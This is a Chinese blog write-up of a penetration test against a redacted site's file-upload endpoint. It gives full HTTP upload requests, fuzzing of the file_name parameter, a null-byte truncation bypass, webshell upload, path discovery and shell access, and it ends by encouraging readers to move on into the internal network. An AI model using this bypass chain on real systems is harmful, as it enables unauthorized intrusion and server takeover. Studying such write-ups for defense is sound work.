万网极研社

记一次未授权上传

2020-04-27  本文已影响0人  Linux大师

通过JS接口翻找路径:
http://xxxxx.com/xxxxx/xxxxxx/importUi.shtml

上传接口
通过审查js源码得知该处只允许上传zip和rar文件,上传完成会在后台进行解压。
上传规则

随即通过上传zip文件抓包。
数据包如下:

POST http://xxxxx.com/xxxxx/xxxxxx/to-edit.shtml HTTP/1.1
Host: xxxxx.com
Content-Length: 636
Accept: text/html, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXSphL8yrZpA3VIlk
Origin: http://xxxxx.com/
Referer: http://xxxxx.com/xxxxx/xxxxxx/importUi.shtml
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: _trs_uv=jyxxcdb3_239_kt3r; _gscu_1272375115=6626431052xejf12; JSESSIONID=90F39005C7A5550C298B649EF2B737B2
Connection: close

------WebKitFormBoundaryXSphL8yrZpA3VIlk
Content-Disposition: form-data; name="sign"

11
------WebKitFormBoundaryXSphL8yrZpA3VIlk
Content-Disposition: form-data; name="fname"

------WebKitFormBoundaryXSphL8yrZpA3VIlk
Content-Disposition: form-data; name="uuidfilename"

------WebKitFormBoundaryXSphL8yrZpA3VIlk
Content-Disposition: form-data; name="zhengwen"; filename="test.zip"
Content-Type: application/x-zip-compressed

PK
11111

------WebKitFormBoundaryXSphL8yrZpA3VIlk
Content-Disposition: form-data; name="file_name"

test.zipjsp

------WebKitFormBoundaryXSphL8yrZpA3VIlk--

发现几个关键点:filename参数、压缩包头PK、file_name参数。


原始上传

尝试jsp,失败。测试PK头部,无用。


绕过测试
以及尝试filename参数,仍无果。

随后在参数后随意添加字符,发现返回包同样加上字符,猜测该文件是解压的文件名。
数据包如下:

POST http://xxxxx.com/xxxxx/xxxxxx/to-edit.shtml HTTP/1.1
Host: xxxxx.com
Content-Length: 602
Accept: text/html, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryu1QbhpSPA31Um6aT
Origin: http://xxxxx.com/
Referer: http://xxxxx.com/xxxxx/xxxxxx/importUi.shtml
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: _trs_uv=jyxxcdb3_239_kt3r; _gscu_1272375115=6626431052xejf12; JSESSIONID=90F39005C7A5550C298B649EF2B737B2
Connection: close

------WebKitFormBoundaryu1QbhpSPA31Um6aT
Content-Disposition: form-data; name="sign"

11
------WebKitFormBoundaryu1QbhpSPA31Um6aT
Content-Disposition: form-data; name="fname"

------WebKitFormBoundaryu1QbhpSPA31Um6aT
Content-Disposition: form-data; name="uuidfilename"

------WebKitFormBoundaryu1QbhpSPA31Um6aT
Content-Disposition: form-data; name="zhengwen"; filename="test.zip"
Content-Type: application/x-zip-compressed

------WebKitFormBoundaryu1QbhpSPA31Um6aT
Content-Disposition: form-data; name="file_name"

test.zipmjgmccnx8m

------WebKitFormBoundaryu1QbhpSPA31Um6aT--
上传绕过1

尝试进行00截断:


上传绕过2

马儿上传成功,只缺路径,前台文件一个个翻下去,得到上传路径,利用前期上传的zip得知目录正确。


路径获取
getshell成功:
getshell

至此渗透打点完成,内网渗透就看各自发挥了.........

上一篇下一篇

猜你喜欢

热点阅读